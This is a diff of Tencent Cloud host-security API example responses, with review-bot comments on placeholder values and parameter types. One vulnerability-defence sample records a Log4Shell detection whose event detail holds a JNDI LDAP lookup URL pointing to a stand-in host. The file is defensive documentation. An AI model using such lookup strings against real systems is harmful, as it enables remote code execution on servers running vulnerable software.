+ "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"BruteAttackList\": [\n {\n \"Id\": 202443000000,\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"MachineIp\": \"172.16.0.40\",\n \"MachineName\": \"机器名称\",\n \"UserName\": \"root\",\n \"SrcIp\": \"1.1.1.1\",\n \"Status\": \"SUCCESS\",\n \"EventType\": 300,\n \"Country\": 1,\n \"City\": 343,\n \"Province\": 32,\n \"CreateTime\": \"2024-10-22 19:50:12\",\n \"ModifyTime\": \"2024-10-22 20:06:34\",\n \"BanStatus\": 1,\n \"Count\": 436,\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"IsProVersion\": true,\n \"Protocol\": \"ssh\",\n \"Port\": 22,\n \"InstanceId\": \"ins-12332112\",\n \"Location\": \"中国香港::\",\n \"DataStatus\": 0,\n \"RiskLevel\": 2,\n \"MachineExtraInfo\": {\n \"WanIP\": \"1.1.1.1\",\n \"PrivateIP\": \"\",\n \"NetworkType\": 0,\n \"NetworkName\": \"\",\n \"InstanceID\": \"ins-12332112\",\n \"HostName\": \"\"\n },\n \"DataFrom\": 0,\n \"AttackStatusDesc\": \"破解成功\",\n \"BanExpiredTime\": \"\"\n }\n ],\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
1384
1372
  "title": "获取密码破解列表"
1385
1373
  }
1386
1374
  ],
@@ -1442,7 +1430,7 @@
1442
1430
  {
1443
1431
  "document": "",
1444
1432
  "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeDefenceEventDetail\n<公共请求参数>\n\n{\n \"Id\": 123\n}",
1445
- "output": "{\n \"Response\": {\n \"Data\": {\n \"City\": \"深圳\",\n \"StackTrace\": \"xx\",\n \"Fix\": \"修复描述\",\n \"NetworkPayload\": \"xx\",\n \"Id\": 0,\n \"SourceIp\": \"xx\",\n \"Status\": 0,\n \"Description\": \"xx\",\n \"EventType\": 1,\n \"ExceptionPstree\": \"xx\",\n \"MergeTime\": \"xx\",\n \"Count\": 0,\n \"MachineStatus\": \"ONLINE\",\n \"VulName\": \"xx\",\n \"Alias\": \"xx\",\n \"MainClass\": \"xx.class\",\n \"CveId\": \"xx\",\n \"Pid\": 0,\n \"PrivateIp\": \"xx\",\n \"PublicIp\": \"xx\",\n \"Quuid\": \"xx\",\n \"EventDetail\": \"xx\",\n \"SourcePort\": [\n 1\n ],\n \"CreateTime\": \"xx\"\n },\n \"RequestId\": \"xx\"\n }\n}",
1433
+ "output": "{\n \"Response\": {\n \"Data\": {\n \"Id\": 10001,\n \"Status\": 1,\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Alias\": \"Alias-name\",\n \"MachineStatus\": \"ONLINE\",\n \"PrivateIp\": \"1.1.1.1\",\n \"PublicIp\": \"1.1.1.1.\",\n \"CreateTime\": \"2024-10-23 11:41:10\",\n \"MergeTime\": \"2024-10-23 11:43:52\",\n \"VulName\": \"Apache log4j2 远程代码执行漏洞 (CVE-2021-44228)\",\n \"EventType\": 2,\n \"Count\": 20,\n \"CveId\": \"CVE-2021-44228\",\n \"SourceIp\": \"\",\n \"City\": \"\",\n \"SourcePort\": null,\n \"Description\": \"腾讯安全注意到,一个Apache Log4j2高危漏洞细节已被公开,Log4j-2<2.15.0的版本中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。\",\n \"Fix\": \"请注意,只有 log4j-core JAR 文件受此漏洞影响。仅使用 log4j-api JAR 文件而不使用 log4j-core JAR 文件的应用程序不受此漏洞的影响。腾讯安全专家建议受影响的用户尽快升级到2.16.0及以上版本。\\n最新安全版本请参考官方安全通告:https://logging.apache.org/log4j/2.x/security.html\\n更新包下载地址:https://logging.apache.org/log4j/2.x/download.html\\n漏洞缓解措施 (仍会检出漏洞):\\n(1)从类路径中删除 JndiLookup 类: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\\n腾讯云WAF和云防火墙均已支持该漏洞防护\\nWAF试用:https://cloud.tencent.com/act/pro/clbwafenterprise \\n配置WAF: https://console.cloud.tencent.com/guanjia/tea-instance-new\\n云防火墙试用:https://console.cloud.tencent.com/cfw/ips\",\n \"NetworkPayload\": \"OiAK\",\n \"Pid\": 20545,\n \"MainClass\": \"org.eclipse.jetty.start.Main\",\n \"StackTrace\": 
\"org.apache.logging.log4j.core.lookup.JndiLookup.lookup\\norg.apache.logging.log4j.core.lookup.Interpolator.lookup\\norg.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable\\norg.apache.logging.log4j.core.lookup.StrSubstitutor.substitute\\norg.apache.logging.log4j.core.lookup.StrSubstitutor.substitute\\norg.apache.logging.log4j.core.lookup.StrSubstitutor.replace\\norg.apache.logging.log4j.core.pattern.MessagePatternConverter.format\\norg.apache.logging.log4j.core.pattern.PatternFormatter.format\\norg.apache.logging.log4j.core.pattern.MaxLengthConverter.format\\norg.apache.logging.log4j.core.pattern.PatternFormatter.format\\norg.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializable\\norg.apache.logging.log4j.core.layout.PatternLayout.toText\\norg.apache.logging.log4j.core.layout.PatternLayout.encode\\norg.apache.logging.log4j.core.layout.PatternLayout.encode\\norg.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.directEncodeEvent\\norg.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.tryAppend\\norg.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.append\\norg.apache.logging.log4j.core.config.AppenderControl.tryCallAppender\\norg.apache.logging.log4j.core.config.AppenderControl.callAppender0\\norg.apache.logging.log4j.core.config.AppenderControl.callAppenderPreventRecursion\\norg.apache.logging.log4j.core.config.AppenderControl.callAppender\\norg.apache.logging.log4j.core.config.LoggerConfig.callAppenders\\norg.apache.logging.log4j.core.async.AsyncLoggerConfig.callAppenders\\norg.apache.logging.log4j.core.config.LoggerConfig.processLogEvent\\norg.apache.logging.log4j.core.config.LoggerConfig.log\\norg.apache.logging.log4j.core.async.AsyncLoggerConfig.log\\norg.apache.logging.log4j.core.async.AsyncLoggerConfig.logToAsyncLoggerConfigsOnCurrentThread\\norg.apache.logging.log4j.core.async.AsyncLoggerConfigDisruptor$Log4jEventWrapperHandler.onEvent\\norg.apache.logging.log4j.core.async.Asy
ncLoggerConfigDisruptor$Log4jEventWrapperHandler.onEvent\\ncom.lmax.disruptor.BatchEventProcessor.processEvents\\ncom.lmax.disruptor.BatchEventProcessor.run\\njava.lang.Thread.run\\n\",\n \"EventDetail\": \"[{\\\"name\\\":\\\"jndiurl\\\",\\\"value\\\":\\\"ldap://1.8.0_102.example.com\\\"}]\",\n \"ExceptionPstree\": \"\",\n \"MachineExtraInfo\": {\n \"WanIP\": \"1.1.1.1\",\n \"PrivateIP\": \"1.1.1.1\",\n \"NetworkType\": 1,\n \"NetworkName\": \"vpc-12332112\",\n \"InstanceID\": \"ins-12332112\",\n \"HostName\": \"机器名称\"\n }\n },\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
1446
1434
  "title": "获取漏洞防御事件详情"
1447
1435
  }
1448
1436
  ],
@@ -1530,7 +1518,7 @@
1530
1518
  {
1531
1519
  "document": "正常获取",
1532
1520
  "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeFileTamperEvents\n<公共请求参数>\n\n{\n \"Offset\": 1,\n \"Limit\": 1\n}",
1533
- "output": "{\n \"Response\": {\n \"List\": [\n {\n \"Id\": 370572797,\n \"Uuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"Quuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"HostIp\": \"0.0.0.0\",\n \"HostName\": \"销售许可测试机器\",\n \"Type\": 0,\n \"ProcessExe\": \"/usr/bin/crontab\",\n \"ProcessArgv\": \"crontab /root/cron.tmp\",\n \"Target\": \"/var/spool/cron/#tmp.VM-124-81-tencentos.XXXX2QUwZR\",\n \"Status\": 0,\n \"EventCount\": 1,\n \"RuleId\": 1,\n \"RuleName\": \"系统策略-篡改计划任务\",\n \"Pstree\": \"[{\\\"pid\\\":980959,\\\"exe\\\":\\\"/usr/bin/crontab\\\",\\\"account\\\":\\\"root:root\\\",\\\"cmdline\\\":\\\"crontab /root/cron.tmp\\\",\\\"start_time\\\":1729557954,\\\"type\\\":1},{\\\"pid\\\":2288,\\\"exe\\\":\\\"/root/chaos-executor\\\",\\\"account\\\":\\\"root:root\\\",\\\"cmdline\\\":\\\"./chaos-executor d -p 29785a94e8324cda92d0715188765ece -f id_rsa.pub -n Production -s polaris://trpc.tchaos.ServerPush;polaris://trpc.tchaos.proxy.ServerPush -c Production\\\",\\\"start_time\\\":1729471587,\\\"type\\\":2}]\",\n \"CreateTime\": \"2024-10-22 08:45:58\",\n \"ModifyTime\": \"2024-10-22 08:45:58\",\n \"Level\": 1,\n \"RuleCategory\": 0,\n \"MachineStatus\": \"ONLINE\",\n \"Description\": \"检测到系统计划任务被修改\",\n \"Suggestion\": \"排查是否为正常业务需要的计划任务修改\",\n \"PrivateIp\": \"xx.xx.xx.xx\",\n \"ExePermission\": \"-rwsr-xr-x\",\n \"UserName\": \"0\",\n \"UserGroup\": \"0\",\n \"ExeMd5\": \"569f953571579ec4ae613cca7862930a\",\n \"ExeSize\": 0,\n \"ExeTime\": 1669715461,\n \"TargetSize\": 981,\n \"TargetPermission\": \"-rw-------\",\n \"TargetModifyTime\": \"2024-10-22 08:45:54\",\n \"TargetCreatTime\": \"2024-10-22 08:45:54\",\n \"ExePid\": 980959,\n \"TargetName\": \"#tmp.VM-124-81-tencentos.XXXX2QUwZR\",\n \"Reference\": \"\",\n \"ExeName\": \"crontab\",\n \"FileAction\": \"write\",\n \"MachineExtraInfo\": {\n \"WanIP\": \"0.0.0.0\",\n \"PrivateIP\": \"xx.xx.xx.xx\",\n \"NetworkType\": 0,\n \"NetworkName\": \"\",\n \"InstanceID\": \"ins-dsdsds\",\n \"HostName\": 
\"\"\n }\n }\n ],\n \"TotalCount\": 1,\n \"RequestId\": \"abc\"\n }\n}",
1521
+ "output": "{\n \"Response\": {\n \"List\": [\n {\n \"Id\": 370572797,\n \"Uuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"Quuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"HostIp\": \"0.0.0.0\",\n \"HostName\": \"销售许可测试机器\",\n \"Type\": 0,\n \"ProcessExe\": \"/usr/bin/crontab\",\n \"ProcessArgv\": \"crontab /root/cron.tmp\",\n \"Target\": \"/var/spool/cron/#tmp.VM-124-81-tencentos.XXXX2QUwZR\",\n \"Status\": 0,\n \"EventCount\": 1,\n \"RuleId\": 1,\n \"RuleName\": \"系统策略-篡改计划任务\",\n \"Pstree\": \"[{\\\"pid\\\":980959,\\\"exe\\\":\\\"/usr/bin/crontab\\\",\\\"account\\\":\\\"root:root\\\",\\\"cmdline\\\":\\\"crontab /root/cron.tmp\\\",\\\"start_time\\\":1729557954,\\\"type\\\":1},{\\\"pid\\\":2288,\\\"exe\\\":\\\"/root/chaos-executor\\\",\\\"account\\\":\\\"root:root\\\",\\\"cmdline\\\":\\\"./chaos-executor d -p 29785a94e8324 -f id_rsa.pub -n Production -s Production\\\",\\\"start_time\\\":1729471587,\\\"type\\\":2}]\",\n \"CreateTime\": \"2024-10-22 08:45:58\",\n \"ModifyTime\": \"2024-10-22 08:45:58\",\n \"Level\": 1,\n \"RuleCategory\": 0,\n \"MachineStatus\": \"ONLINE\",\n \"Description\": \"检测到系统计划任务被修改\",\n \"Suggestion\": \"排查是否为正常业务需要的计划任务修改\",\n \"PrivateIp\": \"xx.xx.xx.xx\",\n \"ExePermission\": \"-rwsr-xr-x\",\n \"UserName\": \"0\",\n \"UserGroup\": \"0\",\n \"ExeMd5\": \"569f953571579ec4ae613cca7862930a\",\n \"ExeSize\": 0,\n \"ExeTime\": 1669715461,\n \"TargetSize\": 981,\n \"TargetPermission\": \"-rw-------\",\n \"TargetModifyTime\": \"2024-10-22 08:45:54\",\n \"TargetCreatTime\": \"2024-10-22 08:45:54\",\n \"ExePid\": 980959,\n \"TargetName\": \"#tmp.VM-124-81-tencentos.XXXX2QUwZR\",\n \"Reference\": \"\",\n \"ExeName\": \"crontab\",\n \"FileAction\": \"write\",\n \"MachineExtraInfo\": {\n \"WanIP\": \"0.0.0.0\",\n \"PrivateIP\": \"xx.xx.xx.xx\",\n \"NetworkType\": 0,\n \"NetworkName\": \"\",\n \"InstanceID\": \"ins-dsdsds\",\n \"HostName\": \"\"\n }\n }\n ],\n \"TotalCount\": 1,\n \"RequestId\": \"abc\"\n }\n}",
1534
1522
  "title": "核心文件监控事件列表"
1535
1523
  }
1536
1524
  ],
@@ -1593,8 +1581,8 @@
1593
1581
  "DescribeHostLoginList": [
1594
1582
  {
1595
1583
  "document": "登录审计列表",
1596
- "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeHostLoginList\n<公共请求参数>\n\n{\n \"Limit\": 1,\n \"Filters\": [\n {\n \"Values\": [\n \"abc\"\n ],\n \"Name\": \"abc\",\n \"ExactMatch\": true\n }\n ],\n \"Offset\": 1\n}",
1597
- "output": "{\n \"Response\": {\n \"HostLoginList\": [\n {\n \"Id\": 202008000000022,\n \"Uuid\": \"5cc8e4d2-311f-11ea-922b-98be9421969a\",\n \"MachineIp\": \"10.104.194.49\",\n \"MachineName\": \"v_lwjlin_centos_林\",\n \"UserName\": \"root\",\n \"SrcIp\": \"120.229.227.225\",\n \"Status\": 2,\n \"Country\": 1,\n \"City\": 216,\n \"Province\": 19,\n \"LoginTime\": \"2020-02-20 14:51:35\",\n \"ModifyTime\": \"2020-02-20 14:51:35\",\n \"IsRiskUser\": 0,\n \"Port\": 22,\n \"Location\": \"中国:广东省:深圳市\",\n \"Desc\": \"\",\n \"IsRiskSrcIp\": 1,\n \"IsRiskArea\": 1,\n \"Quuid\": \"xxxx-xxxx-xxxxxx-xxxxxx-xxxx\",\n \"RiskLevel\": 0,\n \"IsRiskTime\": 1,\n \"MachineExtraInfo\": {\n \"WanIP\": \"111.111.111.111\",\n \"InstanceID\": \"ins-12341234\",\n \"NetworkName\": \"\",\n \"PrivateIP\": \"1.1.1.1\",\n \"NetworkType\": 1,\n \"HostName\": \"abc\"\n }\n }\n ],\n \"RequestId\": \"4234234\",\n \"TotalCount\": 446\n }\n}",
1584
+ "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeHostLoginList\n<公共请求参数>\n\n{\n \"Limit\": 1,\n \"Offset\": 1\n}",
1585
+ "output": "{\n \"Response\": {\n \"HostLoginList\": [\n {\n \"Id\": 202008000000022,\n \"Uuid\": \"5cc8e4d2-311f-11ea-922b-98be9421969a\",\n \"MachineIp\": \"10.104.194.49\",\n \"MachineName\": \"v_lwjlin_centos_林\",\n \"UserName\": \"root\",\n \"SrcIp\": \"120.229.227.225\",\n \"Status\": 2,\n \"Country\": 1,\n \"City\": 216,\n \"Province\": 19,\n \"LoginTime\": \"2020-02-20 14:51:35\",\n \"ModifyTime\": \"2020-02-20 14:51:35\",\n \"IsRiskUser\": 0,\n \"Port\": 22,\n \"Location\": \"中国:广东省:深圳市\",\n \"Desc\": \"\",\n \"IsRiskSrcIp\": 1,\n \"IsRiskArea\": 1,\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"RiskLevel\": 0,\n \"IsRiskTime\": 1,\n \"MachineExtraInfo\": {\n \"WanIP\": \"1.1.1.1\",\n \"InstanceID\": \"ins-12341234\",\n \"NetworkName\": \"\",\n \"PrivateIP\": \"1.1.1.1\",\n \"NetworkType\": 1,\n \"HostName\": \"机器名称\"\n }\n }\n ],\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\",\n \"TotalCount\": 1\n }\n}",
1598
1586
  "title": "登录审计列表"
1599
1587
  }
1600
1588
  ],
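Review bot: The new `output` for DescribeHostLoginList still carries `"SrcIp": "120.229.227.225"` and `"MachineName": "v_lwjlin_centos_林"`, which read like values from a real environment rather than placeholders, even though the same line replaces Quuid, WanIP, HostName and RequestId with neutral ones. For a shipped example of a login-audit record I would use a documentation address and a generic name, e.g. `"SrcIp": "192.0.2.10"` (a constructed sample from the RFC 5737 range) and `"MachineName": "机器名称"`. The DescribeVulDefenceEvent hunk further down shows the same pattern in `"Alias": "harborV2_yancyw"`. The filler `1.1.1.1` used throughout is also a routable public address, so the RFC 5737 ranges would be a safer default for these examples.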
@@ -1801,16 +1789,16 @@
1801
1789
  "DescribeLoginWhiteCombinedList": [
1802
1790
  {
1803
1791
  "document": "获取登录审计白名单列表-支持新版本筛选",
1804
- "input": "https://cwp.tencentcloudapi.com/?Action=DescribeLoginWhiteCombinedList\n&Limit=10\n&Offset=0\n&<公共请求参数>",
1805
- "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"RequestId\": \"xx\",\n \"LoginWhiteCombinedInfos\": [\n {\n \"UserName\": \"xx\",\n \"Remark\": \"xx\",\n \"Name\": \"xx\",\n \"Places\": [\n {\n \"CityId\": 1,\n \"CountryId\": 1,\n \"ProvinceId\": 1\n }\n ],\n \"Locale\": \"xx\",\n \"IsGlobal\": 1,\n \"CreateTime\": \"xx\",\n \"Uuid\": \"xx\",\n \"StartTime\": \"xx\",\n \"ModifyTime\": \"xx\",\n \"SrcIp\": \"xx\",\n \"EndTime\": \"xx\",\n \"Id\": 1,\n \"Desc\": \"xx\"\n }\n ]\n }\n}",
1792
+ "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeLoginWhiteCombinedList\n<公共请求参数>\n\n{\n \"Limit\": \"10\",\n \"Offset\": \"0\"\n}",
1793
+ "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\",\n \"LoginWhiteCombinedInfos\": [\n {\n \"Id\": 357790160,\n \"Places\": null,\n \"UserName\": \"root\",\n \"SrcIp\": \"1.1.1.1\",\n \"IsGlobal\": 0,\n \"CreateTime\": \"2019-12-25 11:57:15\",\n \"ModifyTime\": \"2019-12-25 11:57:15\",\n \"Locale\": \"\",\n \"Locations\": \"\",\n \"Remark\": \"\",\n \"StartTime\": \"\",\n \"EndTime\": \"\",\n \"Name\": \"cwp\",\n \"Desc\": \"1.1.1.1\",\n \"Uuid\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n ]\n }\n}",
1806
1794
  "title": "获取登录审计白名单列表-支持新版本筛选"
1807
1795
  }
1808
1796
  ],
1809
1797
  "DescribeLoginWhiteHostList": [
1810
1798
  {
1811
1799
  "document": "编辑登录审计白名单",
1812
- "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeLoginWhiteHostList\n<公共请求参数>\n\n{\n \"Limit\": 1,\n \"Id\": 1,\n \"Filters\": [\n {\n \"Values\": [\n \"xx\"\n ],\n \"Name\": \"xx\",\n \"ExactMatch\": true\n }\n ],\n \"Offset\": 1\n}",
1813
- "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"Hosts\": [\n {\n \"MachineName\": \"xx\",\n \"Quuid\": \"xx\",\n \"MachineWanIp\": \"xx\",\n \"Uuid\": \"xx\",\n \"MachineIp\": \"xx\",\n \"Tags\": []\n }\n ],\n \"RequestId\": \"xx\"\n }\n}",
1800
+ "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeLoginWhiteHostList\n<公共请求参数>\n\n{\n \"Limit\": 1,\n \"Id\": 1,\n \"Offset\": 1\n}",
1801
+ "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"Hosts\": [\n {\n \"MachineName\": \"机器名称\",\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"MachineWanIp\": \"1.1.1.1\",\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"MachineIp\": \"1.1.1.1\",\n \"Tags\": []\n }\n ],\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
1814
1802
  "title": "编辑登录审计白名单"
1815
1803
  }
1816
1804
  ],
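Review bot: The rewritten DescribeLoginWhiteCombinedList request passes the paging values as strings, `"Limit": "10"` and `"Offset": "0"`, while the DescribeHostLoginList and DescribeLoginWhiteHostList examples next to it send the same-named parameters as numbers (`"Limit": 1`). If the API declares these as integers, which the neighbouring examples suggest but this page does not show, a user copying the body gets a type mismatch; I would write `"Limit": 10` and `"Offset": 0`. The DescribeVulFixStatus hunk has the same issue with `"FixId": "1"`, where the response on the next line returns `"FixId": 1`.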
@@ -1818,7 +1806,7 @@
1818
1806
  {
1819
1807
  "document": "获取异地登录白名单列表",
1820
1808
  "input": "https://cwp.tencentcloudapi.com/?Action=DescribeLoginWhiteList\n&Limit=10\n&Offset=0\n&<公共请求参数>",
1821
- "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"RequestId\": \"xx\",\n \"LoginWhiteLists\": [\n {\n \"UserName\": \"xx\",\n \"Uuid\": \"xx\",\n \"Places\": [\n {\n \"CityId\": 1,\n \"CountryId\": 1,\n \"ProvinceId\": 1\n },\n {\n \"CityId\": 1,\n \"CountryId\": 1,\n \"ProvinceId\": 1\n }\n ],\n \"MachineName\": \"xx\",\n \"HostIp\": \"xx\",\n \"IsGlobal\": true,\n \"CreateTime\": \"2020-09-22 00:00:00\",\n \"StartTime\": \"xx\",\n \"ModifyTime\": \"2020-09-22 00:00:00\",\n \"SrcIp\": \"xx\",\n \"EndTime\": \"xx\",\n \"Id\": 1\n },\n {\n \"UserName\": \"xx\",\n \"Uuid\": \"xx\",\n \"Places\": [\n {\n \"CityId\": 1,\n \"CountryId\": 1,\n \"ProvinceId\": 1\n }\n ],\n \"MachineName\": \"xx\",\n \"ModifyTime\": \"2020-09-22 00:00:00\",\n \"IsGlobal\": true,\n \"Id\": 1,\n \"StartTime\": \"xx\",\n \"HostIp\": \"xx\",\n \"SrcIp\": \"xx\",\n \"EndTime\": \"xx\",\n \"CreateTime\": \"2020-09-22 00:00:00\"\n }\n ]\n }\n}",
1809
+ "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\",\n \"LoginWhiteLists\": [\n {\n \"UserName\": \"root\",\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Places\": [\n {\n \"CityId\": 1,\n \"CountryId\": 1,\n \"ProvinceId\": 1\n },\n {\n \"CityId\": 1,\n \"CountryId\": 1,\n \"ProvinceId\": 1\n }\n ],\n \"MachineName\": \"机器名称\",\n \"HostIp\": \"1.1.1.1\",\n \"IsGlobal\": true,\n \"CreateTime\": \"2020-09-22 00:00:00\",\n \"StartTime\": \"2020-09-22 00:00:00\",\n \"ModifyTime\": \"2020-09-22 00:00:00\",\n \"SrcIp\": \"1.1.1.1\",\n \"EndTime\": \"2020-09-22 00:00:00\",\n \"Id\": 1\n }\n ]\n }\n}",
1822
1810
  "title": "获取异地登录白名单列表"
1823
1811
  }
1824
1812
  ],
@@ -1970,7 +1958,7 @@
1970
1958
  {
1971
1959
  "document": "",
1972
1960
  "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeMalwareRiskOverview\n<公共请求参数>\n\n{}",
1973
- "output": "{\n \"Response\": {\n \"Data\": {\n \"ProcessCount\": 0,\n \"ScanTime\": \"xx\",\n \"HostCount\": 0,\n \"IsFirstScan\": true,\n \"FileCount\": 0\n },\n \"RequestId\": \"xx\"\n }\n}",
1961
+ "output": "{\n \"Response\": {\n \"Data\": {\n \"ProcessCount\": 0,\n \"ScanTime\": \"2019-12-25 11:57:15\",\n \"HostCount\": 0,\n \"IsFirstScan\": true,\n \"FileCount\": 0\n },\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
1974
1962
  "title": "获取文件查杀概览信息"
1975
1963
  }
1976
1964
  ],
@@ -2050,8 +2038,8 @@
2050
2038
  {
2051
2039
  "document": "",
2052
2040
  "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribePrivilegeEventInfo\n<公共请求参数>\n\n{\n \"Id\": 12\n}",
2053
- "output": "{\n \"Response\": {\n \"PrivilegeEventInfo\": {\n \"UserName\": \"xx\",\n \"Uuid\": \"xx\",\n \"ParentProcUser\": \"xx\",\n \"ProcFilePrivilege\": \"xx\",\n \"UserGroup\": \"xx\",\n \"Status\": 1,\n \"MachineWanIp\": \"xx\",\n \"Tags\": [\n \"xx\"\n ],\n \"MachineName\": \"xx\",\n \"HarmDescribe\": \"xx\",\n \"SuggestScheme\": \"xx\",\n \"CmdLine\": \"xx\",\n \"NewCaps\": \"xx\",\n \"ParentProcName\": \"xx\",\n \"ProcessName\": \"xx\",\n \"ParentProcPath\": \"xx\",\n \"Id\": 1,\n \"References\": [\n \"xx\"\n ],\n \"Quuid\": \"xx\",\n \"ParentProcGroup\": \"xx\",\n \"HostIp\": \"xx\",\n \"MachineStatus\": \"xx\",\n \"FullPath\": \"xx\",\n \"CreateTime\": \"xx\",\n \"PsTree\": \"xx\"\n },\n \"RequestId\": \"f14ce73f-50d7-4c36-af1d-fc33dae510c4\"\n }\n}",
2054
- "title": "示例"
2041
+ "output": "{\n \"Response\": {\n \"PrivilegeEventInfo\": {\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"UserName\": \"root\",\n \"UserGroup\": \"1000\",\n \"ProcessName\": \"privilege\",\n \"CmdLine\": \"./privilege\",\n \"ParentProcName\": \"bash\",\n \"ParentProcUser\": \"1000\",\n \"CreateTime\": \"2024-09-06 14:17:45\",\n \"Status\": 0,\n \"FullPath\": \"/tmp/privilege\",\n \"ParentProcGroup\": \"1000\",\n \"ParentProcPath\": \"/usr/bin/bash\",\n \"PsTree\": \"[]\",\n \"NewCaps\": \"SYS_RAWIO|DAC_OVERRIDE|DAC_READ_SEARCH|FOWNER|FSETID|KILL|SETGID|SETUID|SETPCAP|LINUX_IMMUTABLE|NET_BIND_SERVICE|NET_BROADCAST|NET_ADMIN|NET_RAW|IPC_LOCK|IPC_OWNER|SYS_MODULE|CHOWN|BLOCK_SUSPEND|WAKE_ALARM|SYSLOG|MAC_ADMIN|MAC_OVERRIDE|SETFCAP|AUDIT_CONTROL|AUDIT_WRITE|LEASE|MKNOD|SYS_TTY_CONFIG|SYS_TIME|SYS_RESOURCE|SYS_NICE|SYS_BOOT|SYS_ADMIN|SYS_PACCT|SYS_PTRACE|SYS_CHROOT\",\n \"ModifyTime\": \"2024-09-06 14:17:45\",\n \"MachineName\": \"机器名称\",\n \"ProcFilePrivilege\": \"-rwsr-xr-x\",\n \"HostIp\": \"1.1.1.1\",\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Id\": 10001,\n \"MachineWanIp\": \"1.1.1.1\",\n \"SuggestScheme\": \"1、检查系统是否被添加新用户,或者存在异常权限用户;\\n2、检查恶意进程及非法端口,删除可疑的启动项和定时任务;\\n3.隔离或者删除相关的木马文件;\\n4.对系统进行风险排查,并进行安全加固,详情可参考如下链接:xa0\\n【Linux】https://cloud.tencent.com/document/product/296/9604xa0\\n【Windows】https://cloud.tencent.com/document/product/296/9605\",\n \"HarmDescribe\": \"黑客在入侵服务器后,为了进行下一步的恶意操作,会通过特定漏洞提升用户权限,或者直接获取root用户权限。\",\n \"Tags\": [],\n \"References\": [],\n \"MachineStatus\": \"ONLINE\"\n },\n \"RequestId\": \"f7f4d0bc-171d-491e-b97b-5c9bcb5a52a0\"\n }\n}",
2042
+ "title": "查询本地提权详情"
2055
2043
  }
2056
2044
  ],
2057
2045
  "DescribePrivilegeEvents": [
@@ -2066,7 +2054,7 @@
2066
2054
  {
2067
2055
  "document": "获取本地提权规则列表",
2068
2056
  "input": "https://cwp.tencentcloudapi.com/?Action=DescribePrivilegeRules\n&<公共请求参数>",
2069
- "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Status\": 1,\n \"ModifyTime\": \"xx\",\n \"Uuid\": \"xx\",\n \"SMode\": 1,\n \"IsGlobal\": 1,\n \"CreateTime\": \"xx\",\n \"ProcessName\": \"xx\",\n \"Hostip\": \"xx\",\n \"Operator\": \"xx\",\n \"Id\": 1\n }\n ],\n \"RequestId\": \"xx\"\n }\n}",
2057
+ "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Id\": 10001,\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"ProcessName\": \"privilege\",\n \"SMode\": 1,\n \"Operator\": \"\",\n \"Status\": 0,\n \"IsGlobal\": 0,\n \"CreateTime\": \"2024-08-23 17:13:47\",\n \"ModifyTime\": \"2024-08-23 17:13:47\",\n \"Hostip\": \"1.1.1.1\"\n }\n ],\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
2070
2058
  "title": "获取本地提权规则列表"
2071
2059
  }
2072
2060
  ],
@@ -2226,15 +2214,15 @@
2226
2214
  {
2227
